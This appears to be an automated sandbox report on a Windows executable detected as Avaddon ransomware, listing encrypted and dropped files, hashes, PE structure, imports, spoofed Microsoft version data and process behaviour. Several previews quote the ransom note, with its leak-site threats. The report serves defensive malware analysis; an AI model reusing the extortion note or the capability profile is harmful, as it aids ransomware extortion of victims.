                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9801260914850625
                        Encrypted:false
                        SSDEEP:192:gha6HGClUhI3Gjp/QSZ02LhueKNUDOVJO1Z0xsV+S:ghad8euW4eusOM
                        MD5:682454B464D455523FF72503EDF3CDBA
                        SHA1:30DF38C7599A42F488C79E25ED833631596E1BE5
                        SHA-256:DAC37AA39D7B01B37911C2F120A540CC49B0FE19DD6E334431DF79D363CD7755
                        SHA-512:7BF4D66E3B634EAF48F8E8CCF727ED7338682CDB301F16D927991AA8C23CBB27DDF232D9F852039A4B937768A992C8AF0BB581BE392F4100A14398FDC5427D77
                        Malicious:false
                        C:\Users\user\Favorites\Live.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9801260914850625
                        Encrypted:false
                        SSDEEP:192:gha6HGClUhI3Gjp/QSZ02LhueKNUDOVJO1Z0xsV+S:ghad8euW4eusOM
                        MD5:682454B464D455523FF72503EDF3CDBA
                        SHA1:30DF38C7599A42F488C79E25ED833631596E1BE5
                        SHA-256:DAC37AA39D7B01B37911C2F120A540CC49B0FE19DD6E334431DF79D363CD7755
                        SHA-512:7BF4D66E3B634EAF48F8E8CCF727ED7338682CDB301F16D927991AA8C23CBB27DDF232D9F852039A4B937768A992C8AF0BB581BE392F4100A14398FDC5427D77
                        Malicious:false
                        C:\Users\user\Favorites\NYTimes.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979581989857302
                        Encrypted:false
                        SSDEEP:192:dzjX9aHGqqam+MaAsiqvKXDv/wgEWcOw3h2FF1xXV+B:dH9l5aVRKXLY4cB3hSxS
                        MD5:CC2E5970074930A64F329409670E9DF4
                        SHA1:5D8519FD457E87B6F314D8F88D426B3F277D105D
                        SHA-256:98255D0B71B6BD986AEE3E89ECA4B71581DB4D0DF4008E765A6681EEA55AE439
                        SHA-512:E0ADFD743DD25BE66162DF8E4CD85F9ADC79F7BA9662D07DB45D2C54AB6160353BC1661DA5F8A0C59B12B12591B8C28744D71CFF6DF1747AF5F16B4EBE86A6B0
                        Malicious:false
                        C:\Users\user\Favorites\NYTimes.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979581989857302
                        Encrypted:false
                        SSDEEP:192:dzjX9aHGqqam+MaAsiqvKXDv/wgEWcOw3h2FF1xXV+B:dH9l5aVRKXLY4cB3hSxS
                        MD5:CC2E5970074930A64F329409670E9DF4
                        SHA1:5D8519FD457E87B6F314D8F88D426B3F277D105D
                        SHA-256:98255D0B71B6BD986AEE3E89ECA4B71581DB4D0DF4008E765A6681EEA55AE439
                        SHA-512:E0ADFD743DD25BE66162DF8E4CD85F9ADC79F7BA9662D07DB45D2C54AB6160353BC1661DA5F8A0C59B12B12591B8C28744D71CFF6DF1747AF5F16B4EBE86A6B0
                        Malicious:false
                        C:\Users\user\Favorites\Reddit.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978191571455435
                        Encrypted:false
                        SSDEEP:192:f7eYWIpRz5pavvmXcJfZSvggYjHkbADQpNAy35Nr1meV+0:DeYWetpavvmX2fEvggYjHkbADQzAyJDl
                        MD5:AF477E4BEA54E0030818C51F4A9739C2
                        SHA1:FAA5FD1D72DBBF89500C808B69BBCE8B8214474D
                        SHA-256:732A5B8AAD89331EA7E60E15F3821B383538E213EAC30E810BF729472F156643
                        SHA-512:278FC8982807EFC3C4C92DB986DE1B611AFA9DC99B9564B28D7D085BA0A93BEA0514386B8BCC5D277F8A70B9872908767A349B8076694C0225E6275CA0198089
                        Malicious:false
                        C:\Users\user\Favorites\Reddit.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978191571455435
                        Encrypted:false
                        SSDEEP:192:f7eYWIpRz5pavvmXcJfZSvggYjHkbADQpNAy35Nr1meV+0:DeYWetpavvmX2fEvggYjHkbADQzAyJDl
                        MD5:AF477E4BEA54E0030818C51F4A9739C2
                        SHA1:FAA5FD1D72DBBF89500C808B69BBCE8B8214474D
                        SHA-256:732A5B8AAD89331EA7E60E15F3821B383538E213EAC30E810BF729472F156643
                        SHA-512:278FC8982807EFC3C4C92DB986DE1B611AFA9DC99B9564B28D7D085BA0A93BEA0514386B8BCC5D277F8A70B9872908767A349B8076694C0225E6275CA0198089
                        Malicious:false
                        C:\Users\user\Favorites\Twitter.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980343775402425
                        Encrypted:false
                        SSDEEP:192:OnJMoxCij+83WmRPF4qxVd8rysIDMEi7GWSqWK19kuYjnw356P3LsUnPBV+B:OJMo0iy83WmHz8rePiSHqpknU56f4a8
                        MD5:BFA3BDA09A4BEFB393E0E6481FA97384
                        SHA1:0C7FBE7B611887E7A6C0258926735BB021D74458
                        SHA-256:8069354C7E6263590D126F343A0689D1C936CDA7F06BF76B3F59BE1E238FA29F
                        SHA-512:CEFCF86CE4271B3935293DF680512B55D72B30761F96EB7543051D9391BF3554D7756181BB9D73B4D2AAAAB44C8F133DB328B7D226030860FEAB05D627C724A0
                        Malicious:false
                        C:\Users\user\Favorites\Twitter.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980343775402425
                        Encrypted:false
                        SSDEEP:192:OnJMoxCij+83WmRPF4qxVd8rysIDMEi7GWSqWK19kuYjnw356P3LsUnPBV+B:OJMo0iy83WmHz8rePiSHqpknU56f4a8
                        MD5:BFA3BDA09A4BEFB393E0E6481FA97384
                        SHA1:0C7FBE7B611887E7A6C0258926735BB021D74458
                        SHA-256:8069354C7E6263590D126F343A0689D1C936CDA7F06BF76B3F59BE1E238FA29F
                        SHA-512:CEFCF86CE4271B3935293DF680512B55D72B30761F96EB7543051D9391BF3554D7756181BB9D73B4D2AAAAB44C8F133DB328B7D226030860FEAB05D627C724A0
                        Malicious:false
                        C:\Users\user\Favorites\Wikipedia.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978018385763095
                        Encrypted:false
                        SSDEEP:192:j0R/DCLBuB/tt4ZgB/RNzK7BSC9I1ZVkUzEMvvoIGJWusV+z:jc/Dy0L4Z57oCsVkUAWFGJ1R
                        MD5:0DB82588350044F10C0D895C3272FB9D
                        SHA1:1DFE0CF7132BE411476FA2BE70F5397498D0D94E
                        SHA-256:8406F595CD0CF5FF37B8F93E236897F989572F63E19C3BEA18E13691786A3C9F
                        SHA-512:3FB4D009DB11D4A32DDA018A4DCFBF40D33972EE46CB3A107854FD1A8CC203F696B291C04D8C8B771831FB63294869EDE91C8BE75F4A5B249D2D90A262F4154D
                        Malicious:false
                        C:\Users\user\Favorites\Wikipedia.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978018385763095
                        Encrypted:false
                        SSDEEP:192:j0R/DCLBuB/tt4ZgB/RNzK7BSC9I1ZVkUzEMvvoIGJWusV+z:jc/Dy0L4Z57oCsVkUAWFGJ1R
                        MD5:0DB82588350044F10C0D895C3272FB9D
                        SHA1:1DFE0CF7132BE411476FA2BE70F5397498D0D94E
                        SHA-256:8406F595CD0CF5FF37B8F93E236897F989572F63E19C3BEA18E13691786A3C9F
                        SHA-512:3FB4D009DB11D4A32DDA018A4DCFBF40D33972EE46CB3A107854FD1A8CC203F696B291C04D8C8B771831FB63294869EDE91C8BE75F4A5B249D2D90A262F4154D
                        Malicious:false
                        C:\Users\user\Favorites\Youtube.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978719986599969
                        Encrypted:false
                        SSDEEP:192:eKrxfc3krhe2xz8WclyqlzHlpJoQh+Gea+TwVAV+B:9rle2Srlyqlj3JoQgGeEF
                        MD5:D584C6FC40F4B53A02D034FDD54C36B1
                        SHA1:BD1951CCE3E00AD22C5ACE565BB45BABDD331247
                        SHA-256:0957C4C0198A3E822D27E72881CBBD61C038AD6A83320FC1054D1FB318B08D7E
                        SHA-512:660436C59427E50AC95D605C7622F32E8031897F0E45654B64EFFFC83D76FAAD70496806AAF819525F4BC443413403C9CE218012B144ADD12189ACB7A681028C
                        Malicious:false
                        C:\Users\user\Favorites\Youtube.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978719986599969
                        Encrypted:false
                        SSDEEP:192:eKrxfc3krhe2xz8WclyqlzHlpJoQh+Gea+TwVAV+B:9rle2Srlyqlj3JoQgGeEF
                        MD5:D584C6FC40F4B53A02D034FDD54C36B1
                        SHA1:BD1951CCE3E00AD22C5ACE565BB45BABDD331247
                        SHA-256:0957C4C0198A3E822D27E72881CBBD61C038AD6A83320FC1054D1FB318B08D7E
                        SHA-512:660436C59427E50AC95D605C7622F32E8031897F0E45654B64EFFFC83D76FAAD70496806AAF819525F4BC443413403C9CE218012B144ADD12189ACB7A681028C
                        Malicious:false
                        C:\Users\user\Favorites\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3767
                        Entropy (8bit):5.732830353776197
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69z:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USH
                        MD5:EBBC41B4612B4F05935168B03FE2175B
                        SHA1:F68370ED27B5467588F93D88554C0B785A44713D
                        SHA-256:528B86EC4A39421DB8905A0A5556EB92570F63A3BB43EF16CB5909BCA11ED6F8
                        SHA-512:F3514C22495BDA1771C3C292BE9DE3E7E0D78B3AA970CDCFA9D8A134E1DF99DAF056F80AC16B346A49A7E1570FEE6D180F4865A43555E6E9BC5C0408B5F89E97
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Searches\Everywhere.search-ms
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976341860493078
                        Encrypted:false
                        SSDEEP:192:ey887N9Djak0xP3NsM9ngpVNe7GxImRAXGRzlIp9ycrpHus/e/RwFYEggg6V+Z:lzYvt90c7GSm6GRzlUEcFrjKDB
                        MD5:EF982A4D6098340340B3AAD684E33432
                        SHA1:56600C97984CB4465A330E69E570FDB71C567C40
                        SHA-256:057D6D15E3AB1822F21E8A8CE603ACCCDD4B56E6D703766B7E12C081EA0F08AF
                        SHA-512:57F72D5AEC12B7E269519E767CF41A16F1560E751273C447F77B3E7FB7E56A8670F7A59245F242FFD4384C7052BBFAC73697B82AF7603A9C4D60B44BBB3A09E4
                        Malicious:false
                        C:\Users\user\Searches\Everywhere.search-ms.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976341860493078
                        Encrypted:false
                        SSDEEP:192:ey887N9Djak0xP3NsM9ngpVNe7GxImRAXGRzlIp9ycrpHus/e/RwFYEggg6V+Z:lzYvt90c7GSm6GRzlUEcFrjKDB
                        MD5:EF982A4D6098340340B3AAD684E33432
                        SHA1:56600C97984CB4465A330E69E570FDB71C567C40
                        SHA-256:057D6D15E3AB1822F21E8A8CE603ACCCDD4B56E6D703766B7E12C081EA0F08AF
                        SHA-512:57F72D5AEC12B7E269519E767CF41A16F1560E751273C447F77B3E7FB7E56A8670F7A59245F242FFD4384C7052BBFAC73697B82AF7603A9C4D60B44BBB3A09E4
                        Malicious:false
                        C:\Users\user\Searches\Indexed Locations.search-ms
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978673171427752
                        Encrypted:false
                        SSDEEP:192:e5JYbZdg6BHGjFVI/koQ6Fu91uL8V1yewKj+uUZSFHTQ9GV+Z:eXY9dg6BYjZT9G8V1ymj+YFzQT
                        MD5:F8F16067320D6B56A37957E8BE004FED
                        SHA1:B632DEDFBE0FF2BE86998C67EDD7FAA8DC07B32D
                        SHA-256:BD0110068A3B821070A7B6B862B0B434E56840EA22588DF3ED80C8DBDCEA448D
                        SHA-512:AC02B1924EEE986461DE2219F60F1E85356B17654AE37A46A4E46C3B6B6A81084BD05D4477BE4A24936C8D4B944C1BF2177174BC19F486E67F74220230E7D46C
                        Malicious:false
                        C:\Users\user\Searches\Indexed Locations.search-ms.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978673171427752
                        Encrypted:false
                        SSDEEP:192:e5JYbZdg6BHGjFVI/koQ6Fu91uL8V1yewKj+uUZSFHTQ9GV+Z:eXY9dg6BYjZT9G8V1ymj+YFzQT
                        MD5:F8F16067320D6B56A37957E8BE004FED
                        SHA1:B632DEDFBE0FF2BE86998C67EDD7FAA8DC07B32D
                        SHA-256:BD0110068A3B821070A7B6B862B0B434E56840EA22588DF3ED80C8DBDCEA448D
                        SHA-512:AC02B1924EEE986461DE2219F60F1E85356B17654AE37A46A4E46C3B6B6A81084BD05D4477BE4A24936C8D4B944C1BF2177174BC19F486E67F74220230E7D46C
                        Malicious:false
                        C:\Users\user\Searches\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3773
                        Entropy (8bit):5.733390727901314
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69+:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USy
                        MD5:830B1E10F7D9AF9FBAAFDA9D0C601484
                        SHA1:D1FBCE92660ACA875EC5DB91A02CDD034B79A58C
                        SHA-256:78761F28E2B181A64E58D1852F32663A032D0F30FE7BF17D38A91BE7BEB4498C
                        SHA-512:5C930EF247753F5AA61725DFAECF929915058E74638FA7624C2AFA04C021C86AB50598387360674634AF1042F73238E4F789610877D9B599AE0D5F74F840E657
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        \Device\ConDrv
                        Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):48
                        Entropy (8bit):4.305255793112395
                        Encrypted:false
                        SSDEEP:3:8yzGc7C1RREal:nzGtRV
                        MD5:6ED2062D4FB53D847335AE403B23BE62
                        SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                        SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                        SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                        Malicious:false
                        Preview: ERROR:...Description = Initialization failure...

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.16411908069709
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:ab.exe
                        File size:794112
                        MD5:0b486fe0503524cfe4726a4022fa6a68
                        SHA1:297dea71d489768ce45d23b0f8a45424b469ab00
                        SHA256:1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2
                        SHA512:f4273ca5cc3a9360af67f4b4ee0bf067cf218c5dc8caeafbfa1b809715effe742f2e1f54e4fe9ec8d4b8e3ae697d57f91c2b49bdf203648508d75d4a76f53619
                        SSDEEP:24576:TCs99+OXLpMePfI8TgmBTCDqEbOpPtpFhyxfq:5GOXLpMePfzVTCD7gPtLhSfq
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.I.}.'}}.'}}.'}i.$|l.'}i."|..'}i.#|j.'}i.!|..'}..#|l.'}..$|k.'}.."|..'}i.&|j.'}}.&}..'}...|l.'}...}|.'}}..}|.'}..%||.'}Rich}.'

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x43f186
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x60689947 [Sat Apr 3 16:35:19 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:b56503b8c4f46a3a086734c09c6bd0f3

                        Entrypoint Preview

                        Instruction
                        call 00007F7564D21E0Fh
                        jmp 00007F7564D2148Fh
                        mov ecx, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], ecx
                        pop ecx
                        pop edi
                        pop edi
                        pop esi
                        pop ebx
                        mov esp, ebp
                        pop ebp
                        push ecx
                        ret
                        mov ecx, dword ptr [ebp-10h]
                        xor ecx, ebp
                        call 00007F7564D20EDFh
                        jmp 00007F7564D215F0h
                        push eax
                        push dword ptr fs:[00000000h]
                        lea eax, dword ptr [esp+0Ch]
                        sub esp, dword ptr [esp+0Ch]
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [eax], ebp
                        mov ebp, eax
                        mov eax, dword ptr [004B4018h]
                        xor eax, ebp
                        push eax
                        push dword ptr [ebp-04h]
                        mov dword ptr [ebp-04h], FFFFFFFFh
                        lea eax, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], eax
                        ret
                        push eax
                        push dword ptr fs:[00000000h]
                        lea eax, dword ptr [esp+0Ch]
                        sub esp, dword ptr [esp+0Ch]
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [eax], ebp
                        mov ebp, eax
                        mov eax, dword ptr [004B4018h]
                        xor eax, ebp
                        push eax
                        mov dword ptr [ebp-10h], eax
                        push dword ptr [ebp-04h]
                        mov dword ptr [ebp-04h], FFFFFFFFh
                        lea eax, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], eax
                        ret
                        push eax
                        push dword ptr fs:[00000000h]
                        lea eax, dword ptr [esp+0Ch]
                        sub esp, dword ptr [esp+0Ch]
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [eax], ebp
                        mov ebp, eax
                        mov eax, dword ptr [004B4018h]
                        xor eax, ebp
                        push eax
                        mov dword ptr [ebp-10h], esp
                        push dword ptr [ebp-04h]
                        mov dword ptr [ebp-04h], FFFFFFFFh

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb20a0 | 0xf0 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x5d8 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbd000 | 0x8d44 | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa6e2c | 0x38 | .rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa6e68 | 0x40 | .rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x84000 | 0x358 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x8284c | 0x82a00 | False | 0.488630756579 | data | 6.60983970569 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata | 0x84000 | 0x2f3d6 | 0x2f400 | False | 0.264529596561 | data | 3.62244340935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0xb4000 | 0x7818 | 0x6800 | False | 0.106745793269 | data | 3.31661959005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xbc000 | 0x5d8 | 0x600 | False | 0.453125 | data | 4.07117757835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xbd000 | 0x8d44 | 0x8e00 | False | 0.518926056338 | data | 6.64901147486 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        Name | RVA | Size | Type | Language | Country
                        RT_VERSION | 0xbc0a0 | 0x3ac | data | English | United States
                        RT_MANIFEST | 0xbc450 | 0x188 | XML 1.0 document text | English | United States

                        Imports

                        DLL | Import
                        KERNEL32.dll | GetVolumeInformationW, WriteFile, CreateFileW, ReadFile, GetFileSizeEx, GetQueuedCompletionStatus, GetFileAttributesW, PostQueuedCompletionStatus, SetFileAttributesW, GetSystemInfo, SetFilePointerEx, MoveFileExW, CreateIoCompletionPort, FindFirstFileW, FindNextFileW, GetEnvironmentVariableW, FindClose, GetDiskFreeSpaceW, GetLocaleInfoA, GetComputerNameA, WriteConsoleW, GetTickCount, OpenMutexW, CopyFileW, CreateProcessW, GetProcessHeap, GetThreadContext, HeapAlloc, CloseHandle, Process32FirstW, GetCurrentThread, Process32NextW, GetLastError, Sleep, CreateToolhelp32Snapshot, CheckRemoteDebuggerPresent, WaitForSingleObject, CreateMutexW, GetModuleFileNameW, TerminateProcess, GetCurrentProcess, HeapFree, WideCharToMultiByte, MultiByteToWideChar, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindVolumeClose, SetVolumeMountPointW, FindFirstVolumeW, HeapSize, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, GetFileType, GetTimeZoneInformation, HeapReAlloc, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, OpenProcess, IsDebuggerPresent, GetTimeFormatW, GetDateFormatW, GetStdHandle, ExitProcess, GetModuleHandleExW, ExitThread, RaiseException, RtlUnwind, LoadLibraryW, UnregisterWaitEx, QueryDepthSList, InterlockedFlushSList, QueryDosDeviceW, GetLogicalDrives, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, GetExitCodeThread, GetStringTypeW, QueryPerformanceCounter, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, GetCPInfo, LocalFree, CompareStringW, LCMapStringW, GetLocaleInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, CreateTimerQueue, SetEvent, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, FreeLibrary, FreeLibraryAndExitThread, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList
                        ADVAPI32.dll | ControlService, OpenServiceW, GetTokenInformation, CryptDuplicateKey, CryptSetKeyParam, CryptDestroyKey, CryptAcquireContextW, CryptEncrypt, CryptExportKey, CryptImportKey, CryptGenKey, CryptReleaseContext, LookupPrivilegeValueW, AdjustTokenPrivileges, InitiateShutdownW, RegCloseKey, CloseServiceHandle, OpenSCManagerW, DeleteService, RegOpenKeyExW, EnumDependentServicesW, RegSetValueExW, OpenProcessToken, StartServiceW, QueryServiceStatusEx
                        SHELL32.dll | SHEmptyRecycleBinW, ShellExecuteW
                        ole32.dll | CoInitializeEx, CoUninitialize, CoCreateInstance, CoInitializeSecurity, CoSetProxyBlanket
                        OLEAUT32.dll | VariantClear, SysAllocString, SysFreeString, SysAllocStringByteLen, VariantInit, SysStringByteLen
                        MPR.dll | WNetGetConnectionW
                        NETAPI32.dll | NetDfsEnum, NetShareEnum, NetApiBufferFree
                        IPHLPAPI.DLL | SendARP
                        WS2_32.dll | gethostbyname, gethostname, inet_addr, htons, getnameinfo, WSACleanup, inet_ntoa, WSAStartup
                        RstrtMgr.DLL | RmEndSession, RmShutdown, RmGetList, RmStartSession, RmRegisterResources
                        CRYPT32.dll | CryptStringToBinaryA

                        Version Infos

                        Description | Data
                        LegalCopyright | Microsoft Corporation. All rights reserved.
                        InternalName | taskhost.exe
                        FileVersion | 10.0.17763.831 (WinBuild.160101.0800)
                        CompanyName | Microsoft Corporation
                        ProductName | Microsoft Windows Operating System
                        ProductVersion | 10.0.17763.831
                        FileDescription | Host Process for Windows Tasks
                        OriginalFilename | taskhost.exe
                        Translation | 0x0409 0x04b0

                        Possible Origin

                        Language of compilation system | Country where language is spoken
                        English | United States

                        Network Behavior

                        No network behavior found

                        Code Manipulations

                        System Behavior

                        General

                        Start time:16:47:33
                        Start date:06/01/2022
                        Path:C:\Users\user\Desktop\ab.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\ab.exe"
                        Imagebase:0x10e0000
                        File size:794112 bytes
                        MD5 hash:0B486FE0503524CFE4726A4022FA6A68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
